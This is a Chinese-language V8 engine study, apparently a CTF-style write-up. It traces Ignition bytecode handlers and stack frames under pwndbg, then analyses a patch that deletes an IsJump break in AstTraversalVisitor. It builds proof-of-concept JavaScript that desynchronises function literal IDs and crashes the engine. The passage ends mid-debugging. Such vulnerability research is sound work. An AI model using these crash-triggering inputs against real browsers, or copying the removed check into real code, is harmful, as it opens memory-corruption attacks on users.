0x7f0a68ec947a <Builtins_LdaConstantHandler+762> mov r9, rbx
0x7f0a68ec947d <Builtins_LdaConstantHandler+765> add rsp, 0x40
► 0x7f0a68ec9481 <Builtins_LdaConstantHandler+769> jmp rcx <Builtins_LdaZeroHandler>
↓
0x7f0a68ec8d80 <Builtins_LdaZeroHandler> lea rbx, [rip - 7] <0x7f0a68ec8d80>
0x7f0a68ec8d87 <Builtins_LdaZeroHandler+7> cmp rbx, rcx
0x7f0a68ec8d8a <Builtins_LdaZeroHandler+10> je Builtins_LdaZeroHandler+28 <Builtins_LdaZeroHandler+28>
↓
0x7f0a68ec8d9c <Builtins_LdaZeroHandler+28> lea rbx, [r9 + 1]
0x7f0a68ec8da0 <Builtins_LdaZeroHandler+32> movzx edx, byte ptr [rbx + r14]
在源码src/interpreter/interpreter-generator.cc
中实现了所有字节码的Handler,比如我们上面调试的LdaConstant
// LdaConstant <idx>
//
// Load constant literal at |idx| in the constant pool into the accumulator.
IGNITION_HANDLER(LdaConstant, InterpreterAssembler) {
Node* constant = LoadConstantPoolEntryAtOperandIndex(0);
SetAccumulator(constant);
Dispatch();
}
结尾通过Dispatch
实现自动执行到下一个bytecode。
理解字节码/虚拟机架构
对于如下代码,我们打印一下字节码
function fun(x) {
var a = 0x666;
if (x) {
print("hello");
} else {
print("world");
}
return a;
}
%DebugPrint(fun);
%SystemBreak();
fun(true);
fun(false);
[generated bytecode for function: ]
Parameter count 1
Register count 4
Frame size 32
0x3225d5b9e9da @ 0 : 12 00 LdaConstant [0] ;从常量池加载第0个元素
0x3225d5b9e9dc @ 2 : 26 fa Star r1 ;存入r1寄存器
0x3225d5b9e9de @ 4 : 0b LdaZero ;累加器清零
0x3225d5b9e9df @ 5 : 26 f9 Star r2 ;存入r2寄存器
0x3225d5b9e9e1 @ 7 : 27 fe f8 Mov <closure>, r3
0x3225d5b9e9e4 @ 10 : 61 2d 01 fa 03 CallRuntime [DeclareGlobals], r1-r3 ;声名fun函数
0 E> 0x3225d5b9e9e9 @ 15 : a5 StackCheck ;栈检查
125 S> 0x3225d5b9e9ea @ 16 : 13 01 00 LdaGlobal [1], [0] ;从常量此取出第1个元素作为名称,找到变量,这里找到的是fun函数对象
0x3225d5b9e9ed @ 19 : 26 fa Star r1 ;;存入r1
0x3225d5b9e9ef @ 21 : 61 65 01 fa 01 CallRuntime [DebugPrint], r1-r1
143 S> 0x3225d5b9e9f4 @ 26 : 61 a7 01 fb 00 CallRuntime [SystemBreak], r0-r0
159 S> 0x3225d5b9e9f9 @ 31 : 0d LdaUndefined
0x3225d5b9e9fa @ 32 : 26 f9 Star r2
0x3225d5b9e9fc @ 34 : 13 01 00 LdaGlobal [1], [0]
0x3225d5b9e9ff @ 37 : 26 fa Star r1
0x3225d5b9ea01 @ 39 : 10 LdaTrue
0x3225d5b9ea02 @ 40 : 26 f8 Star r3
159 E> 0x3225d5b9ea04 @ 42 : 5f fa f9 02 CallNoFeedback r1, r2-r3 调用fun函数
170 S> 0x3225d5b9ea08 @ 46 : 0d LdaUndefined
0x3225d5b9ea09 @ 47 : 26 f9 Star r2
0x3225d5b9ea0b @ 49 : 13 01 00 LdaGlobal [1], [0]
0x3225d5b9ea0e @ 52 : 26 fa Star r1
0x3225d5b9ea10 @ 54 : 11 LdaFalse
0x3225d5b9ea11 @ 55 : 26 f8 Star r3
170 E> 0x3225d5b9ea13 @ 57 : 5f fa f9 02 CallNoFeedback r1, r2-r3 ;调用fun函数
0x3225d5b9ea17 @ 61 : 26 fb Star r0
201 S> 0x3225d5b9ea19 @ 63 : a9 Return
Constant pool (size = 2)
0x3225d5b9e959: [FixedArray] in OldSpace
- map: 0x0fb2739007b1 <Map>
- length: 2
0: 0x3225d5b9e8c1 <FixedArray[4]>
1: 0x3225d5b9e7b9 <String[#3]: fun>
Handler Table (size = 0)
有关字节码的解释,可以在src/interpreter/interpreter-generator.cc
文件中查看。从字节码中,我们可以知道,每一个函数都有一个常量池,里面存储着一些常量。这个常量池是在之前分析的字节码生成过程中的FinalizeUnoptimizedCompilationJob
函数中,其调用了CompilationJob::Status status = job->FinalizeJob(shared_info, isolate);
,
InterpreterCompilationJob::Status InterpreterCompilationJob::FinalizeJobImpl(
Handle<SharedFunctionInfo> shared_info, Isolate* isolate) {
RuntimeCallTimerScope runtimeTimerScope(
parse_info()->runtime_call_stats(),
RuntimeCallCounterId::kCompileIgnitionFinalization);
TRACE_EVENT0(TRACE_DISABLED_BY_DEFAULT("v8.compile"),
"V8.CompileIgnitionFinalization");
Handle<BytecodeArray> bytecodes =
generator()->FinalizeBytecode(isolate, parse_info()->script());
if (generator()->HasStackOverflow()) {
return FAILED;
}
if (ShouldPrintBytecode(shared_info)) {
StdoutStream os;
std::unique_ptr<char[]> name =
compilation_info()->literal()->GetDebugName();
os << "[generated bytecode for function: " << name.get() << "]"
<< std::endl;
bytecodes->Disassemble(os);
os << std::flush;
}
compilation_info()->SetBytecodeArray(bytecodes);
return SUCCEEDED;
}
其中在FinalizeBytecode
中调用了AllocateDeferredConstants
生成了常量池
Handle<BytecodeArray> BytecodeGenerator::FinalizeBytecode(
Isolate* isolate, Handle<Script> script) {
.................
AllocateDeferredConstants(isolate, script);
.................
AllocateDeferredConstants函数如下
void BytecodeGenerator::AllocateDeferredConstants(Isolate* isolate,
Handle<Script> script) {
// Build global declaration pair arrays.
for (GlobalDeclarationsBuilder* globals_builder : global_declarations_) {
Handle<FixedArray> declarations =
globals_builder->AllocateDeclarations(info(), script, isolate);
if (declarations.is_null()) return SetStackOverflow();
builder()->SetDeferredConstantPoolEntry(
globals_builder->constant_pool_entry(), declarations);
}
// Find or build shared function infos.
.....................
// Find or build shared function infos for the native function templates.
.....................
// Build object literal constant properties
.....................
// Build array literal constant elements
.....................
// Build class literal boilerplates.
.....................
// Build template literals.
.....................
}
现在我们来研究一下虚拟机的栈结构
+-------------------------------------+--------------+
| ........... | |
| | |
+-------------------------------------+ |
| R2 | |
| | |
+-------------------------------------+ |
| | |
| R1 | |
+-------------------------------------+ |
| | |
| R0 | |
+-------------------------------------+ |
| | |
| Bytecode offset | |
| | |
+-------------------------------------+ |
| | |
| Bytecode Array | | Callee Frame
| | +--------------------->
+-------------------------------------+ |
| | |
| JSFunction | |
| | |
+-------------------------------------+ |
| Context | |
RBP | | |
<---------------------------------------------------------+ |
| | |
| Previous BP | |
| | |
+-------------------------------------+ |
| | |
| Return Address | |
| | |
+----------------------------------------------------+
| | |
| Argument 3 | |
| | |
+-------------------------------------+ |
| | |
| Argument 2 | |
| | |
+-------------------------------------+ |
| | |
| Argument 1 | | Caller Frame
| | +------------------------->
+-------------------------------------+ |
| | |
| JSGlobalProxy | |
| | |
+-------------------------------------+ |
| | |
| ........ | |
| | |
+-------------------------------------+--------------+
如图是v8虚拟机的栈结构,为了实际调试,首先,我们观察到fun函数
DebugPrint: 0x1ff32561ead1: [Function] in OldSpace
- map: 0x250f54a803b9 <Map(HOLEY_ELEMENTS)> [FastProperties]
- prototype: 0x1ff325601ff1 <JSFunction (sfi = 0x1a302888009)>
- elements: 0x08396ef00c21 <FixedArray[0]> [HOLEY_ELEMENTS]
- function prototype:
- initial_map:
- shared_info: 0x1ff32561e8f1 <SharedFunctionInfo fun>
- name: 0x1ff32561e7b9 <String[#3]: fun>
- builtin: CompileLazy
- formal_parameter_count: 1
- kind: NormalFunction
- context: 0x1ff325601749 <NativeContext[247]>
- code: 0x054bd2f04641 <Code BUILTIN CompileLazy>
它的入口点是BUILTIN CompileLazy
,这一点我们前面介绍过,这是延迟编译,因为我们还没有调用到fun函数。当首次调用时,就会进入CompileLazy
编译。
该函数主要调用了Compiler::Compile(function, Compiler::KEEP_EXCEPTION, &is_compiled_scope)
RUNTIME_FUNCTION(Runtime_CompileLazy) {
HandleScope scope(isolate);
DCHECK_EQ(1, args.length());
CONVERT_ARG_HANDLE_CHECKED(JSFunction, function, 0);
#ifdef DEBUG
if (FLAG_trace_lazy && !function->shared()->is_compiled()) {
PrintF("[unoptimized: ");
function->PrintName();
PrintF("]\n");
}
#endif
StackLimitCheck check(isolate);
if (check.JsHasOverflowed(kStackSpaceRequiredForCompilation * KB)) {
return isolate->StackOverflow();
}
IsCompiledScope is_compiled_scope;
if (!Compiler::Compile(function, Compiler::KEEP_EXCEPTION,
&is_compiled_scope)) {
return ReadOnlyRoots(isolate).exception();
}
DCHECK(function->is_compiled());
return function->code();
}
其中Compiler::Compile(Handle<SharedFunctionInfo> shared_info, ClearExceptionFlag flag, IsCompiledScope* is_compiled_scope)
函数与之前分析的CompileToplevel
函数类似,只是在Compile函数中生成AST使用的是ParseAny
函数。
bool ParseAny(ParseInfo* info, Handle<SharedFunctionInfo> shared_info,
Isolate* isolate) {
DCHECK(!shared_info.is_null());
return info->is_toplevel() ? ParseProgram(info, isolate)
: ParseFunction(info, shared_info, isolate);
}
由于是函数,因此这里调用的是ParseFunction
函数。解析到过程与前面介绍的ParseProgram类似,这里先不叙述。
现在我们对第二个CallNoFeedback
字节码进行断点(因为第一个会触发CompileLazy进行函数编译),这样我们好观察函数调用的过程。对于字节码的断点调试,我们可以使用硬件读断点。
0x98299ea11 @ 55 : 26 f8 Star r3
170 E> 0x98299ea13 @ 57 : 5f fa f9 02 CallNoFeedback r1, r2-r3
0x98299ea17 @ 61 : 26 fb Star r0
201 S> 0x98299ea19 @ 63 : a9 Return
pwndbg> rwatch *0x98299ea13
Hardware read watchpoint 4: *0x98299ea13
继续运行即可来到对应的Handler
► 0x7f04a304fe32 <Builtins_StarHandler+50> movabs r10, 0x100000000
0x7f04a304fe3c <Builtins_StarHandler+60> cmp r10, rbx
0x7f04a304fe3f <Builtins_StarHandler+63> jae Builtins_StarHandler+78 <Builtins_StarHandler+78>
↓
0x7f04a304fe4e <Builtins_StarHandler+78> mov rcx, qword ptr [r15 + rbx*8]
0x7f04a304fe52 <Builtins_StarHandler+82> jmp rcx
↓
0x7f04a307b840 <Builtins_CallNoFeedbackHandler> lea rbx, [rip - 7] <0x7f04a307b840>
0x7f04a307b847 <Builtins_CallNoFeedbackHandler+7> cmp rbx, rcx
0x7f04a307b84a <Builtins_CallNoFeedbackHandler+10> je Builtins_CallNoFeedbackHandler+28 <Builtins_CallNoFeedbackHandler+28>
↓
0x7f04a307b85c <Builtins_CallNoFeedbackHandler+28> mov rdx, rbp
0x7f04a307b85f <Builtins_CallNoFeedbackHandler+31> mov dword ptr [rdx - 0x20], 0
0x7f04a307b866 <Builtins_CallNoFeedbackHandler+38> mov dword ptr [rdx - 0x1c], r9d
这里取到了字节码的操作数
..................
RCX 0xfffffffffffffffa
..................
R8 0x2
..................
0x7f04a307b85f <Builtins_CallNoFeedbackHandler+31> mov dword ptr [rdx - 0x20], 0
0x7f04a307b866 <Builtins_CallNoFeedbackHandler+38> mov dword ptr [rdx - 0x1c], r9d
0x7f04a307b86a <Builtins_CallNoFeedbackHandler+42> movsx rcx, byte ptr [r14 + r9 + 1]
0x7f04a307b870 <Builtins_CallNoFeedbackHandler+48> movzx r8d, byte ptr [r14 + r9 + 3]
0x7f04a307b876 <Builtins_CallNoFeedbackHandler+54> movabs r10, 0x100000000
► 0x7f04a307b880 <Builtins_CallNoFeedbackHandler+64> cmp r10, r8
0x7f04a307b883 <Builtins_CallNoFeedbackHandler+67> jae Builtins_CallNoFeedbackHandler+82 <Builtins_CallNoFeedbackHandler+82>
继续执行,这里开始取寄存器R1
..........
RCX 0xfffffffffffffffa
RDX 0x7ffe9194e4b0 —▸ 0x7ffe9194e4d8 —▸ 0x7ffe9194e540 —▸ 0x7ffe9194e590 —▸ 0x7ffe9194e8c0 ◂— ...
..........
RBP 0x7ffe9194e4b0 —▸ 0x7ffe9194e4d8 —▸ 0x7ffe9194e540 —▸ 0x7ffe9194e590 —▸ 0x7ffe9194e8c0 ◂— ...
..........
*RIP 0x7f227e7e089c (Builtins_CallNoFeedbackHandler+92) ◂— mov rcx, qword ptr [rdx + rcx*8]
0x7f227e7e0876 <Builtins_CallNoFeedbackHandler+54> movabs r10, 0x100000000
0x7f227e7e0880 <Builtins_CallNoFeedbackHandler+64> cmp r10, r8
0x7f227e7e0883 <Builtins_CallNoFeedbackHandler+67> jae Builtins_CallNoFeedbackHandler+82 <Builtins_CallNoFeedbackHandler+82>
↓
0x7f227e7e0892 <Builtins_CallNoFeedbackHandler+82> mov r11, qword ptr [rdx - 8]
0x7f227e7e0896 <Builtins_CallNoFeedbackHandler+86> movsx r9, byte ptr [r14 + r9 + 2]
► 0x7f227e7e089c <Builtins_CallNoFeedbackHandler+92> mov rcx, qword ptr [rdx + rcx*8]
0x7f227e7e08a0 <Builtins_CallNoFeedbackHandler+96> lea rbx, [rdx + r9*8]
可以知道,这是从RBP开始向上偏移-6个单元取数据,也就是R1位于-6个单元处,这与我们前面的栈结构图相对应了,并且可以知道,虚拟机使用的是系统栈,而不是独立的栈。继续查看数据
pwndbg> tel $rdx
00:0000│ rdx r12 rbp 0x7ffe9194e4b0 —▸ 0x7ffe9194e4d8 —▸ 0x7ffe9194e540 —▸ 0x7ffe9194e590 —▸ 0x7ffe9194e8c0 ◂— ...
01:0008│ 0x7ffe9194e4b8 —▸ 0x7f227e2b2380 (Builtins_JSEntryTrampoline+96) ◂— cmp qword ptr [rbp - 8], 0x20
02:0010│ 0x7ffe9194e4c0 —▸ 0x30703c601521 ◂— 0x210000196ee5507f
03:0018│ 0x7ffe9194e4c8 —▸ 0x423301ea31 ◂— 0x210000196ee55003
04:0020│ 0x7ffe9194e4d0 ◂— 0x20 /* ' ' */
05:0028│ 0x7ffe9194e4d8 —▸ 0x7ffe9194e540 —▸ 0x7ffe9194e590 —▸ 0x7ffe9194e8c0 —▸ 0x7ffe9194e960 ◂— ...
06:0030│ 0x7ffe9194e4e0 —▸ 0x7f227e2b210d (Builtins_JSEntry+141) ◂— mov r10, qword ptr [r13 + 0x2e28]
07:0038│ 0x7ffe9194e4e8 ◂— 0x0
pwndbg> job 0x30703c601521
0x30703c601521: [JSGlobalProxy]
- map: 0x196ee5507f79 <Map(HOLEY_ELEMENTS)> [FastProperties]
- prototype: 0x00423301a5b9 <JSObject>
- elements: 0x3938a2d00c21 <FixedArray[0]> [HOLEY_ELEMENTS]
- native context: 0x004233001749 <NativeContext[247]>
- properties: 0x3938a2d00c21 <FixedArray[0]> {}
现在我们跟踪进入fun函数,查看fun函数的栈结构
► 0x7f227e7b4e25 <Builtins_StarHandler+37> mov qword ptr [rdx + rbx*8], rax
0x7f227e7b4e29 <Builtins_StarHandler+41> add r9, 2
0x7f227e7b4e2d <Builtins_StarHandler+45> movzx ebx, byte ptr [r9 + r14]
pwndbg> tel $rdx
00:0000│ rdx rbp 0x7ffe9194e450 —▸ 0x7ffe9194e4b0 —▸ 0x7ffe9194e4d8 —▸ 0x7ffe9194e540 —▸ 0x7ffe9194e590 ◂— ...
01:0008│ 0x7ffe9194e458 —▸ 0x7f227e2bcd48 (Builtins_InterpreterEntryTrampoline+968) ◂— mov r14, qword ptr [rbp - 0x18]
02:0010│ 0x7ffe9194e460 —▸ 0x3938a2d00709 ◂— 0x3938a2d006
03:0018│ 0x7ffe9194e468 —▸ 0x30703c601521 ◂— 0x210000196ee5507f
04:0020│ 0x7ffe9194e470 —▸ 0x3938a2d00709 ◂— 0x3938a2d006
05:0028│ 0x7ffe9194e478 —▸ 0x3938a2d004d1 ◂— 0x3938a2d005
06:0030│ 0x7ffe9194e480 —▸ 0x423301ead1 ◂— 0x210000196ee55003
07:0038│ 0x7ffe9194e488 —▸ 0x3938a2d004d1 ◂— 0x3938a2d005
pwndbg> job 0x3938a2d00709
#false
pwndbg> job 0x30703c601521
0x30703c601521: [JSGlobalProxy]
- map: 0x196ee5507f79 <Map(HOLEY_ELEMENTS)> [FastProperties]
- prototype: 0x00423301a5b9 <JSObject>
- elements: 0x3938a2d00c21 <FixedArray[0]> [HOLEY_ELEMENTS]
- native context: 0x004233001749 <NativeContext[247]>
- properties: 0x3938a2d00c21 <FixedArray[0]> {}
从上述实验,我们大致理解了v8点虚拟机架构。现在,我们来讨论特殊的情况,即参数个数不匹配的情况。将测试代码稍作修改
function fun(x) {
var a = 0x666;
if (x) {
print("hello");
} else {
print("world");
}
return a;
}
%DebugPrint(fun);
%SystemBreak();
fun(true);
fun(false,0x666,0x123);
然后以同样的调试方法进行调试,会发现流程会先进入ArgumentsAdaptorTrampoline
► 0x7fd81751dab2 <Builtins_CallFunction_ReceiverIsAny+306> jmp Builtins_ArgumentsAdaptorTrampoline <Builtins_ArgumentsAdaptorTrampoline>
↓
0x7fd81751d580 <Builtins_ArgumentsAdaptorTrampoline> cmp rbx, 0xffff
0x7fd81751d587 <Builtins_ArgumentsAdaptorTrampoline+7> je Builtins_ArgumentsAdaptorTrampoline+244 <Builtins_ArgumentsAdaptorTrampoline+244>
实际上,这是用于适配参数的中间处理函数,有了该函数后的栈结构如下
+---------------------------------------------+---------+
| ........... | |
| | |
+---------------------------------------------+ |
| R2 | |
| | |
+---------------------------------------------+ |
| | |
| R1 | |
+---------------------------------------------+ |
| | |
| R0 | |
+---------------------------------------------+ |
| | |
| Bytecode offset | |
| | |
+---------------------------------------------+ | Callee Frame
| | +--------------------->
| Bytecode Array | |
| | |
+---------------------------------------------+ |
| | |
| JSFunction | |
| | |
+---------------------------------------------+ |
| Context | |
RBP | | |
<-----------------------------------------------------------------+ |
| | |
| ArgumentsAdaptorTrampoline BP | |
| | |
+---------------------------------------------+ |
| | |
| Return to ArgumentsAdaptorTrampoline+xx | |
| | |
+-------------------------------------------------------+
| | |
| Argument 1 | |
| | |
+---------------------------------------------+ |
| JSGlobalProxy | |
| | |
+---------------------------------------------+ |
| | | Adaptor Frame
| ....... | +---------------------->
| | |
+---------------------------------------------+ |
| | |
| Previous BP | |
| | |
+---------------------------------------------+ |
| | |
| Return Address | |
| | |
+-------------------------------------------------------+
| | |
| Argument 3 | |
| | |
+---------------------------------------------+ |
| | |
| Argument 2 | |
| | | Caller Frame
+---------------------------------------------+ +---------------------->
| | |
| Argument 1 | |
+---------------------------------------------+ |
| | |
| JSGlobalProxy | |
| | |
+---------------------------------------------+ |
| ...... | |
| | |
+---------------------------------------------+---------+
即ArgumentsAdaptorTrampoline
会处理好参数后再去调用目标函数,这种匹配方式带来了便利性但是却增加了时间点消耗,在新版的v8中已经移除了这种参数适配器框架,改用了另一种简易的方法即参数倒置。
0x02 漏洞分析利用
patch 分析
diff --git a/src/ast/ast-traversal-visitor.h b/src/ast/ast-traversal-visitor.h
index ac5f8f2f69..1d7c86f46b 100644
--- a/src/ast/ast-traversal-visitor.h
+++ b/src/ast/ast-traversal-visitor.h
@@ -116,7 +116,7 @@ void AstTraversalVisitor<Subclass>::VisitStatements(
for (int i = 0; i < stmts->length(); ++i) {
Statement* stmt = stmts->at(i);
RECURSE(Visit(stmt));
- if (stmt->IsJump()) break;
}
}
patch中去掉了AstTraversalVisitor
中的if (stmt->IsJump()) break;
一句代码,我们先来分析一下如何才能到达这个漏洞点的地方。
延迟编译CompileLazy的AST解析函数ParseFunction
源码如下,
FunctionLiteral* Parser::DoParseFunction(Isolate* isolate, ParseInfo* info,
const AstRawString* raw_name) {
............................
FunctionKind kind = info->function_kind();
if (IsArrowFunction(kind)) {
.............................
if (GetLastFunctionLiteralId() != info->function_literal_id() - 1) {
if (has_error()) return nullptr;
// If there were FunctionLiterals in the parameters, we need to
// renumber them to shift down so the next function literal id for
// the arrow function is the one requested.
AstFunctionLiteralIdReindexer reindexer(
stack_limit_,
(info->function_literal_id() - 1) - GetLastFunctionLiteralId());
for (auto p : formals.params) {
if (p->pattern != nullptr) reindexer.Reindex(p->pattern);
if (p->initializer() != nullptr) {
reindexer.Reindex(p->initializer());
}
}
ResetFunctionLiteralId();
SkipFunctionLiterals(info->function_literal_id() - 1);
}
Expression* expression = ParseArrowFunctionLiteral(formals);
// Scanning must end at the same position that was recorded
// previously. If not, parsing has been interrupted due to a stack
// overflow, at which point the partially parsed arrow function
// concise body happens to be a valid expression. This is a problem
// only for arrow functions with single expression bodies, since there
// is no end token such as "}" for normal functions.
if (scanner()->location().end_pos == info->end_position()) {
// The pre-parser saw an arrow function here, so the full parser
// must produce a FunctionLiteral.
DCHECK(expression->IsFunctionLiteral());
result = expression->AsFunctionLiteral();
}
} else if (IsDefaultConstructor(kind)) {
DCHECK_EQ(scope(), outer);
result = DefaultConstructor(raw_name, IsDerivedConstructor(kind),
info->start_position(), info->end_position());
} else {
ZonePtrList<const AstRawString>* arguments_for_wrapped_function =
info->is_wrapped_as_function()
? PrepareWrappedArguments(isolate, info, zone())
: nullptr;
result = ParseFunctionLiteral(
raw_name, Scanner::Location::invalid(), kSkipFunctionNameCheck, kind,
kNoSourcePosition, function_type, info->language_mode(),
arguments_for_wrapped_function);
}
...................
}
其将函数类似分为了三种类别:箭头函数、构造函数、普通函数。如果箭头函数的参数里存在函数的定义的话,将会使用AstFunctionLiteralIdReindexer
将这些函数的function_literal_id
进行reindex确定顺序。而AstFunctionLiteralIdReindexer
的源码如下
void AstFunctionLiteralIdReindexer::Reindex(Expression* pattern) {
Visit(pattern);
}
void AstFunctionLiteralIdReindexer::VisitFunctionLiteral(FunctionLiteral* lit) {
AstTraversalVisitor::VisitFunctionLiteral(lit);
lit->set_function_literal_id(lit->function_literal_id() + delta_);
}
从代码我们可以知道,这个Reindex实际上就是在遍历AST语法树,如果遇到函数定义,就调用AstTraversalVisitor::VisitFunctionLiteral
,然后为当前的FunctionLiteral
设置新的function_literal_id
,与原值的区别在于加上了一个delta_。AstTraversalVisitor::VisitFunctionLiteral
代码如下,
template <class Subclass>
void AstTraversalVisitor<Subclass>::VisitFunctionLiteral(
FunctionLiteral* expr) {
PROCESS_EXPRESSION(expr);
DeclarationScope* scope = expr->scope();
RECURSE_EXPRESSION(VisitDeclarations(scope->declarations()));
// A lazily parsed function literal won't have a body.
if (expr->scope()->was_lazily_parsed()) return;
RECURSE_EXPRESSION(VisitStatements(expr->body()));
}
这里会调用VisitStatements
继续遍历函数里面的内容,而VisitStatements
就是漏洞点所在的位置。由此我们要想达到漏洞点,需要有箭头函数,且参数里还需要有一个函数。
POC构造
function fun(x) {
var f = (v1 = (o)=>{print("hello");})=>{};
f();
}
fun(true);
首先f是一个箭头函数,而f箭头函数的参数里还有一个函数v1 = (o)=>{print("hello");}
,这样就能触发进入AstFunctionLiteralIdReindexer。为什么需要Reindex,因为解析是按照顺序的,fun的literal_id
为1,而v1的literal_id为2,f的literal_id为3,但是v1的函数被调用的顺序不可能先于f,因为我们只能在f内部去调用v1(如var f = (v1 = (o)=>{print("hello");})=>{v1();};
)。因此f得先被编译,因此需要将f的literal_id
更正为2。
现在需要研究一下漏洞是哪个,是什么造成了漏洞,Parser阶段结束后就是进入GenerateUnoptimizedCode
遍历AST生成字节码,其中也有一个VisitStatements
void BytecodeGenerator::VisitStatements(
const ZonePtrList<Statement>* statements) {
for (int i = 0; i < statements->length(); i++) {
// Allocate an outer register allocations scope for the statement.
RegisterAllocationScope allocation_scope(this);
Statement* stmt = statements->at(i);
Visit(stmt);
if (builder()->RemainderOfBlockIsDead()) break;
}
}
其中的RemainderOfBlockIsDead
代码如下
bool RemainderOfBlockIsDead() const { return exit_seen_in_block_; }
void BytecodeArrayWriter::UpdateExitSeenInBlock(Bytecode bytecode) {
switch (bytecode) {
case Bytecode::kReturn:
case Bytecode::kThrow:
case Bytecode::kReThrow:
case Bytecode::kAbort:
case Bytecode::kJump:
case Bytecode::kJumpConstant:
case Bytecode::kSuspendGenerator:
exit_seen_in_block_ = true;
break;
default:
break;
}
我们再回过头看一下AstTraversalVisitor<Subclass>::VisitStatements
阶段的break条件
bool Statement::IsJump() const {
switch (node_type()) {
#define JUMP_NODE_LIST(V) \
V(Block) \
V(ExpressionStatement) \
V(ContinueStatement) \
V(BreakStatement) \
V(ReturnStatement) \
V(IfStatement)
#define GENERATE_CASE(Node) \
case k##Node: \
return static_cast<const Node*>(this)->IsJump();
JUMP_NODE_LIST(GENERATE_CASE)
#undef GENERATE_CASE
#undef JUMP_NODE_LIST
default:
return false;
}
}
对比发现IsJump
中多了一个对IfStatement
的判断。其中IfStatement
中的IsJump()源码如下
lass IfStatement final : public Statement {
public:
..................
bool IsJump() const {
return HasThenStatement() && then_statement()->IsJump()
&& HasElseStatement() && else_statement()->IsJump();
}
也就是这样的JS代码满足条件
if (a) {
return;
} else {
return;
}
即在if和else分支中都有控制流语句,当AstTraversalVisitor
遍历语法树时遇到这样的语句,就会停止遍历,这意味着位于这样语句后面的函数将不会被reindex,仍然保持原来的literal_id
。而BytecodeGenerator阶段遇到这样的语句不会break,继续生成后面的字节码。我们来构造这样一个样本,观察一下会发生什么
function fun() {
var f = (v1 = (o)=>{
var a = 0;
if (a) {
return;
} else {
return;
}
function f1() {
print("f1");
}
function f2() {
print("f2")
}
})=>{};
f();
}
fun();
语法树如下
[generating bytecode for function: ]
--- AST ---
FUNC at 0
. KIND 0
. SUSPEND COUNT 0
. NAME ""
. INFERRED NAME ""
. DECLS
. . FUNCTION "fun" = function fun
. EXPRESSION STATEMENT at 256
. . ASSIGN at -1
. . . VAR PROXY local[0] (0x55bd8d2babd0) (mode = TEMPORARY, assigned = true) ".result"
. . . CALL
. . . . VAR PROXY unallocated (0x55bd8d2baae0) (mode = VAR, assigned = true) "fun"
. RETURN at -1
. . VAR PROXY local[0] (0x55bd8d2babd0) (mode = TEMPORARY, assigned = true) ".result"
[generating bytecode for function: fun]
--- AST ---
FUNC at 12
. KIND 0
. SUSPEND COUNT 0
. NAME "fun"
. DECLS
. . VARIABLE (0x55bd8d2bc908) (mode = VAR, assigned = false) "f"
. BLOCK NOCOMPLETIONS at -1
. . EXPRESSION STATEMENT at 28
. . . INIT at 28
. . . . VAR PROXY local[0] (0x55bd8d2bc908) (mode = VAR, assigned = false) "f"
. . . . FUNC LITERAL at 28
. . . . . NAME f
. . . . . INFERRED NAME f
. EXPRESSION STATEMENT at 248
. . CALL
. . . VAR PROXY local[0] (0x55bd8d2bc908) (mode = VAR, assigned = false) "f"
[generating bytecode for function: f]
--- AST ---
FUNC at 28
. KIND 8
. SUSPEND COUNT 0
. NAME ""
. PARAMS
. . VAR (0x55bd8d2bfbe8) (mode = TEMPORARY, assigned = true) ""
. DECLS
. . VARIABLE (0x55bd8d2becb8) (mode = LET, assigned = false) "v1"
. BLOCK NOCOMPLETIONS at -1
. . EXPRESSION STATEMENT at -1
. . . INIT at -1
. . . . VAR PROXY local[0] (0x55bd8d2becb8) (mode = LET, assigned = false) "v1"
. . . . CONDITIONAL at -1
. . . . . CONDITION at -1
. . . . . . EQ_STRICT at -1
. . . . . . . VAR PROXY parameter[0] (0x55bd8d2bfbe8) (mode = TEMPORARY, assigned = true) ""
. . . . . . . LITERAL undefined
. . . . . THEN at 34
. . . . . . FUNC LITERAL at 34
. . . . . . . NAME v1
. . . . . . . INFERRED NAME
. . . . . ELSE at -1
. . . . . . VAR PROXY parameter[0] (0x55bd8d2bfbe8) (mode = TEMPORARY, assigned = true) ""
发现v1里面的内容并没有生成语法树,经过测试,发现要想强制让一个函数还没执行到的时候就解析,可以改成这种形式(function() {......})
即匿名函数的形式,同理,我们发现f1和f2的内容也没有解析,我们也一并解析,修改为如下:
function fun() {
var f = (v1 = (function() {
var a = 0;
if (a) {
return;
} else {
return;
}
(function() {
print("f1");
});
(function() {
print("f2")
});
}))=>{};
f();
}
fun();
这回AST就完整了
[generating bytecode for function: v1]
--- AST ---
FUNC at 35
. KIND 0
. SUSPEND COUNT 0
. NAME "v1"
. INFERRED NAME ""
. DECLS
. . VARIABLE (0x55f955ee7f68) (mode = VAR, assigned = false) "a"
. BLOCK NOCOMPLETIONS at -1
. . EXPRESSION STATEMENT at 62
. . . INIT at 62
. . . . VAR PROXY local[0] (0x55f955ee7f68) (mode = VAR, assigned = false) "a"
. . . . LITERAL 0
. IF at 71
. . CONDITION at 75
. . . VAR PROXY local[0] (0x55f955ee7f68) (mode = VAR, assigned = false) "a"
. . THEN at -1
. . . BLOCK at -1
. . . . RETURN at 89
. . . . . LITERAL undefined
. . ELSE at -1
. . . BLOCK at -1
. . . . RETURN at 121
. . . . . LITERAL undefined
. EXPRESSION STATEMENT at 143
. . FUNC LITERAL at 144
. . . NAME
. . . INFERRED NAME
. EXPRESSION STATEMENT at 195
. . FUNC LITERAL at 196
. . . NAME
. . . INFERRED NAME
[generating bytecode for function: ]
--- AST ---
FUNC at 144
. KIND 0
. SUSPEND COUNT 0
. NAME ""
. INFERRED NAME ""
. EXPRESSION STATEMENT at 166
. . CALL
. . . VAR PROXY unallocated (0x55f955ee8e98) (mode = DYNAMIC_GLOBAL, assigned = false) "print"
. . . LITERAL "f1"
[generating bytecode for function: ]
--- AST ---
FUNC at 196
. KIND 0
. SUSPEND COUNT 0
. NAME ""
. INFERRED NAME ""
. EXPRESSION STATEMENT at 218
. . CALL
. . . VAR PROXY unallocated (0x55f955ee8e98) (mode = DYNAMIC_GLOBAL, assigned = false) "print"
. . . LITERAL "f2"
运行时报错
#
# Fatal error in ../../src/objects.cc, line 4857
# Check failed: fun->function_literal_id() < shared_function_infos()->length() (6 vs. 6).
我们来分析一下,在ast-traversal-visitor.h:119
处(if (stmt->IsJump())
break;)下断点
In file: /home/sea/Desktop/v8/src/ast/ast-traversal-visitor.h
114 void AstTraversalVisitor<Subclass>::VisitStatements(
115 const ZonePtrList<Statement>* stmts) {
116 for (int i = 0; i < stmts->length(); ++i) {
117 Statement* stmt = stmts->at(i);
118 RECURSE(Visit(stmt));
► 119 if (stmt->IsJump()) break;
120 }
121 }
pwndbg> p stmt->Print()
IF at 71
. CONDITION at 75
. . VAR PROXY unresolved "a"
. THEN at -1
